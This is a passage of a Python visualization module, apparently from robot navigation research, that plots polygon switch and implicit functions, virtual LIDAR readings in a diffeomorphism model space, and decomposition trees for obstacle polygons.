                # Mask points where the switch is inactive or out of range
                data_points[j][i] = numpy.nan
            else:
                # Add the data point
                data_points[j][i] = sigma
                # Progress counter: row-major linear index (stride is the x
                # resolution, not the y resolution as in the original)
                print(i + j*x_coords.shape[0])
    # Plot the result, ignoring NaN cells
    plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=1, origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
    plt.axis('off')
    plt.colorbar()
    plt.show()
    return
def visualize_diffeoSwitch_convex(PolygonVertices, PlotBounds, NumPoints, PolygonNum, DiffeoParams):
    """
    Function that visualizes the switch function corresponding to a given polygon and a given polygon number in the convex decomposition tree
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
        3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
        4) PolygonNum: Number of polygon for which to visualize the switch function
        5) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        bounds = numpy.array([0, 5, -3, 3])
        num_points = numpy.array([101, 101])
        polygon_num = 0
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.5
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.5
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_diffeoSwitch_convex(xy, bounds, num_points, polygon_num, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
    """
    # Find the tree
    tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
    # Generate x and y coordinates
    x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
    y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
    # Span all the points
    data_points = numpy.zeros((y_coords.shape[0], x_coords.shape[0]))
    for j in range(y_coords.shape[0]):
        for i in range(x_coords.shape[0]):
            candidate_point = numpy.array([[x_coords[i], y_coords[j]]])
            # Find the value of the switch function for the requested polygon
            sigma, sigmad, sigmadd = polygonSwitch(candidate_point, tree[PolygonNum], DiffeoParams)
            if sigma == 0. or sigma > 1:
                # Mask points where the switch is inactive or out of range
                data_points[j][i] = numpy.nan
            else:
                # Add the data point
                data_points[j][i] = sigma
                # Progress counter: row-major linear index (stride is the x
                # resolution, not the y resolution as in the original)
                print(i + j*x_coords.shape[0])
    # Plot the result, ignoring NaN cells
    plt.imshow(data_points, vmin=data_points[~numpy.isnan(data_points)].min(), vmax=1, origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
    plt.axis('off')
    plt.colorbar()
    plt.show()
    return
def visualize_implicit(PolygonVertices, PlotBounds, NumPoints, DiffeoParams):
    """
    Function that visualizes the implicit function corresponding to a given polygon
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
        3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
        4) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        bounds = numpy.array([0, 5, -3, 3])
        num_points = numpy.array([101, 101])
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.5
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.5
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_implicit(xy, bounds, num_points, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
    """
    # Find the tree
    tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
    # Generate x and y coordinates
    x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
    y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
    # Span all the points
    data_points = numpy.zeros((y_coords.shape[0], x_coords.shape[0]))
    current_counter = 0
    time_now = time.time()
    for j in range(y_coords.shape[0]):
        for i in range(x_coords.shape[0]):
            candidate_point = numpy.array([[x_coords[i], y_coords[j]]])
            # Find the value of the implicit function
            beta, betad, betadd = polygonImplicit(candidate_point, tree, DiffeoParams)
            if beta < 0:
                # Mask points inside the polygon
                data_points[j][i] = numpy.nan
                continue
            # Add the data point
            data_points[j][i] = beta
            # Throttled timing report roughly every 100 evaluated points.
            # Row-major linear index: stride is the x resolution (the original
            # used the y resolution, which is wrong for non-square grids).
            linear_index = i + j*x_coords.shape[0]
            if linear_index - current_counter >= 100:
                print([linear_index, (time.time()-time_now)/100])
                current_counter = linear_index
                time_now = time.time()
    # Plot the result, ignoring NaN cells inside the polygon
    valid = data_points[~numpy.isnan(data_points)]
    plt.imshow(data_points, vmin=valid.min(), vmax=valid.max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
    plt.axis('off')
    plt.colorbar()
    plt.show()
    return
def visualize_virtualLIDAR(Polygons, RobotState, RobotRadius, DiffeoParams):
    """
    Function that plots the robot, the obstacles and the LIDAR in the model space
    Input:
        1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
        2) RobotState: State of the robot in the physical space - 3-member numpy.array (x, y, theta)
        3) RobotRadius: Robot radius (m)
        4) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        robot_state = numpy.array([0, 0, 0])
        robot_radius = 0.25
        polygon_list = []
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        polygon_list.append(xy)
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_virtualLIDAR(polygon_list, robot_state, robot_radius, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Construct list of polygonal objects and enlarge by robot radius
    # (mitre joins keep the dilated obstacle boundaries polygonal)
    polygon_list = []
    for i in range(len(Polygons)):
        polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
    # Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
    # NOTE(review): after a union grows polygon i, earlier polygons (index < j) are not
    # re-checked against the enlarged shape; a chain of pairwise-disjoint polygons bridged
    # by a later one may therefore not fully merge - confirm this is acceptable here.
    polygon_list_merged = []
    i = 0
    while (i<len(polygon_list)):
        polygon_list_merged.append(polygon_list[i])
        j = i+1
        while (j<len(polygon_list)):
            if polygon_list_merged[i].intersects(polygon_list[j]):
                polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
                polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
                del(polygon_list[j])
            else:
                j = j+1
        polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
        i = i+1
    PolygonList = polygon_list_merged
    # Register robot state
    RobotPositionX = RobotState[0]
    RobotPositionY = RobotState[1]
    RobotOrientation = RobotState[2]
    RobotPosition = numpy.array([RobotPositionX, RobotPositionY])
    # Create fake LIDAR with range measurements
    # (101 rays over [-2.35, 2.35] rad, all initialized to the nominal 4 m range)
    NumSample = 101
    MinAngle = -2.35
    MaxAngle = 2.35
    Range = 4
    Infinity = 20
    Resolution = (MaxAngle - MinAngle)/(NumSample-1)
    R = Range*numpy.ones(NumSample)
    LIDAR = LIDARClass(R, Range, Infinity, MinAngle, MaxAngle, Resolution)
    # Complete LIDAR readings
    LIDAR = completeLIDAR2D(LIDAR)
    # Set the LIDAR rays that hit known obstacles to the LIDAR range
    for i in range(len(PolygonList)):
        LIDAR = compensateObstacleLIDAR2D(RobotState, PolygonList[i], LIDAR)
    # Construct list of diffeo trees for all objects
    DiffeoTreeArray = []
    for i in range(len(polygon_list_merged)):
        coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
        DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
    # Find list of polygon objects in the model layer based on the known obstacles
    # (each obstacle maps to the disk of its tree root, sampled with 15 boundary points)
    KnownObstaclesModel = []
    for i in range(len(DiffeoTreeArray)):
        theta = numpy.linspace(-numpy.pi, numpy.pi, 15)
        x_coords = DiffeoTreeArray[i][-1]['center'][0][0] + DiffeoTreeArray[i][-1]['radius']*numpy.cos(theta)
        y_coords = DiffeoTreeArray[i][-1]['center'][0][1] + DiffeoTreeArray[i][-1]['radius']*numpy.sin(theta)
        model_disk_coords = numpy.vstack((x_coords,y_coords)).transpose()
        KnownObstaclesModel.append(sp.geometry.polygon.orient(Polygon(model_disk_coords), 1.0))
    # Find the diffeomorphism and its jacobian at the robot position, along with the necessary second derivatives
    # RobotPositionTransformedD is the accumulated 2x2 jacobian of the composed map;
    # RobotPositionTransformedDD appears to be its second derivative flattened to 8 entries
    # (4 per output component) - layout must match polygonDiffeoTriangulation's convention; verify there.
    RobotPositionTransformed = numpy.array([RobotPosition])
    RobotPositionTransformedD = numpy.eye(2)
    RobotPositionTransformedDD = numpy.zeros(8)
    for i in range(len(DiffeoTreeArray)):
        TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(RobotPositionTransformed, DiffeoTreeArray[i], DiffeoParams)
        # res1..res8 apply the chain rule for second derivatives of a composition h = g(f(x)):
        # H_h = Dg * H_f + (Df)^T * H_g * Df, expanded componentwise over the flattened layout.
        # Results are staged in temporaries so all eight use the pre-update DD values.
        res1 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[0] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[4] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][0])
        res2 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[1] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[5] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][1])
        res3 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[2] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[6] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][0])
        res4 = TempPositionTransformedD[0][0]*RobotPositionTransformedDD[3] + TempPositionTransformedD[0][1]*RobotPositionTransformedDD[7] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[0]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[1]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[2]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[3]*RobotPositionTransformedD[1][1])
        res5 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[0] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[4] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][0])
        res6 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[1] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[5] + RobotPositionTransformedD[0][0]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][0]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][1])
        res7 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[2] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[6] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][0]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][0] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][0])
        res8 = TempPositionTransformedD[1][0]*RobotPositionTransformedDD[3] + TempPositionTransformedD[1][1]*RobotPositionTransformedDD[7] + RobotPositionTransformedD[0][1]*(TempPositionTransformedDD[4]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[5]*RobotPositionTransformedD[1][1]) + RobotPositionTransformedD[1][1]*(TempPositionTransformedDD[6]*RobotPositionTransformedD[0][1] + TempPositionTransformedDD[7]*RobotPositionTransformedD[1][1])
        RobotPositionTransformedDD[0] = res1
        RobotPositionTransformedDD[1] = res2
        RobotPositionTransformedDD[2] = res3
        RobotPositionTransformedDD[3] = res4
        RobotPositionTransformedDD[4] = res5
        RobotPositionTransformedDD[5] = res6
        RobotPositionTransformedDD[6] = res7
        RobotPositionTransformedDD[7] = res8
        # Jacobians compose by matrix product; the position simply passes through the map
        RobotPositionTransformedD = numpy.matmul(TempPositionTransformedD, RobotPositionTransformedD)
        RobotPositionTransformed = TempPositionTransformed
    # Find transformed robot orientation
    # (push the physical heading vector through the jacobian and take its angle)
    RobotOrientationTransformed = numpy.arctan2(RobotPositionTransformedD[1][0]*numpy.cos(RobotOrientation)+RobotPositionTransformedD[1][1]*numpy.sin(RobotOrientation), RobotPositionTransformedD[0][0]*numpy.cos(RobotOrientation)+RobotPositionTransformedD[0][1]*numpy.sin(RobotOrientation))
    # Find transformed robot state
    RobotStateTransformed = numpy.array([RobotPositionTransformed[0][0],RobotPositionTransformed[0][1],RobotOrientationTransformed])
    # Read LIDAR data in the model space to account for the known obstacles
    # (range is shrunk by the physical-to-model displacement, presumably to stay conservative
    # in the model space - confirm against readLIDAR2D)
    LIDARmodel = readLIDAR2D(RobotStateTransformed, KnownObstaclesModel, LIDAR.Range-numpy.linalg.norm(RobotPositionTransformed-RobotPosition), LIDAR.MinAngle, LIDAR.MaxAngle, LIDAR.NumSample)
    # Find local freespace; the robot radius can be zero because we have already dilated the obstacles
    LF_model = localfreespaceLIDAR2D(RobotStateTransformed, 0.0, LIDARmodel)
    # Plot LIDAR points
    fig, ax = plt.subplots()
    fig.set_tight_layout(True)
    lidar_plot, = ax.plot(RobotPositionTransformed[0][0] + LIDARmodel.RangeMeasurements*numpy.cos(LIDARmodel.Angle+RobotOrientationTransformed), RobotPositionTransformed[0][1] + LIDARmodel.RangeMeasurements*numpy.sin(LIDARmodel.Angle+RobotOrientationTransformed), '.r')
    ax.set_aspect('equal', 'box')
    # Plot all polygons in the physical space
    for i in range(len(polygon_list_merged)):
        coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
        pgon = plt.Polygon(coords)
        pgon.set_color('c')
        ax.add_patch(pgon)
    # Plot all transformed polygons
    for i in range(len(KnownObstaclesModel)):
        coords = numpy.vstack((KnownObstaclesModel[i].exterior.coords.xy[0],KnownObstaclesModel[i].exterior.coords.xy[1])).transpose()
        pgon = plt.Polygon(coords, alpha=0.3)
        ax.add_patch(pgon)
    # Robot polygon points (0.5 x 0.25 rectangle centered at the origin, robot frame)
    bottom_left_point = numpy.array([[-0.25,-0.125]])
    bottom_right_point = numpy.array([[0.25,-0.125]])
    top_right_point = numpy.array([[0.25,0.125]])
    top_left_point = numpy.array([[-0.25,0.125]])
    # Plot the robot in the physical space
    # (rotate the rectangle by the robot orientation, then translate to the robot position)
    RotMat = numpy.array([[numpy.cos(RobotOrientation), -numpy.sin(RobotOrientation)], [numpy.sin(RobotOrientation), numpy.cos(RobotOrientation)]])
    bottom_left_point_physical = numpy.dot(RotMat, bottom_left_point.transpose()).transpose()
    bottom_right_point_physical = numpy.dot(RotMat, bottom_right_point.transpose()).transpose()
    top_right_point_physical = numpy.dot(RotMat, top_right_point.transpose()).transpose()
    top_left_point_physical = numpy.dot(RotMat, top_left_point.transpose()).transpose()
    robot_polygon_physical = numpy.array([bottom_left_point_physical[0], bottom_right_point_physical[0], top_right_point_physical[0], top_left_point_physical[0], bottom_left_point_physical[0]]) + RobotPosition
    pgon = plt.Polygon(robot_polygon_physical, alpha=0.5)
    pgon.set_color('r')
    ax.add_patch(pgon)
    # Plot the robot in the model space (same rectangle, transformed pose)
    RotMatTransformed = numpy.array([[numpy.cos(RobotOrientationTransformed), -numpy.sin(RobotOrientationTransformed)], [numpy.sin(RobotOrientationTransformed), numpy.cos(RobotOrientationTransformed)]])
    bottom_left_point_transformed = numpy.dot(RotMatTransformed, bottom_left_point.transpose()).transpose()
    bottom_right_point_transformed = numpy.dot(RotMatTransformed, bottom_right_point.transpose()).transpose()
    top_right_point_transformed = numpy.dot(RotMatTransformed, top_right_point.transpose()).transpose()
    top_left_point_transformed = numpy.dot(RotMatTransformed, top_left_point.transpose()).transpose()
    robot_polygon_model = numpy.array([bottom_left_point_transformed[0], bottom_right_point_transformed[0], top_right_point_transformed[0], top_left_point_transformed[0], bottom_left_point_transformed[0]]) + RobotPositionTransformed
    pgon = plt.Polygon(robot_polygon_model)
    ax.add_patch(pgon)
    # Plot the local freespace in the model space
    pgon = plt.Polygon(LF_model, alpha=0.3)
    pgon.set_color('g')
    ax.add_patch(pgon)
    plt.show()
    return
def visualize_tree_triangulation(PolygonVertices, DiffeoParams):
    """
    Function that plots the generated tree to be used in the diffeomorphism (based on the ear clipping method)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_tree_triangulation(xy, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Boundary of the input polygon as two coordinate rows (x on row 0, y on row 1)
    boundary = PolygonVertices.transpose()
    # Dilate the polygon by varepsilon (round joins) and extract the exterior ring
    dilated = Polygon(PolygonVertices).buffer(DiffeoParams['varepsilon'], join_style=1)
    dilated_boundary = numpy.vstack((dilated.exterior.coords.xy[0], dilated.exterior.coords.xy[1]))
    # Draw the original polygon
    plt.plot(boundary[0][:], boundary[1][:], '-b')
    plt.axis('equal')
    # Build the diffeomorphism tree with the ear clipping method
    tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
    # Draw each tree node: its triangle, its dilated version and its center
    for node in tree:
        triangle = numpy.vstack((node['vertices'], node['vertices'][0])).transpose()
        plt.plot(triangle[0][:], triangle[1][:], '-b')
        triangle_tilde = numpy.vstack((node['vertices_tilde'], node['vertices_tilde'][0])).transpose()
        plt.plot(triangle_tilde[0][:], triangle_tilde[1][:])
        plt.plot(node['center'][0][0], node['center'][0][1], 'ok')
    # Draw the dilated polygon boundary
    plt.plot(dilated_boundary[0][:], dilated_boundary[1][:], '-m')
    plt.show()
    return tree
def visualize_tree_convex(PolygonVertices, DiffeoParams):
    """
    Function that plots the generated tree to be used in the diffeomorphism (based on convex decomposition)
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.0
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.0
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_tree_convex(xy, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
        xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
    """
    # Boundary of the input polygon as two coordinate rows (x on row 0, y on row 1)
    boundary = PolygonVertices.transpose()
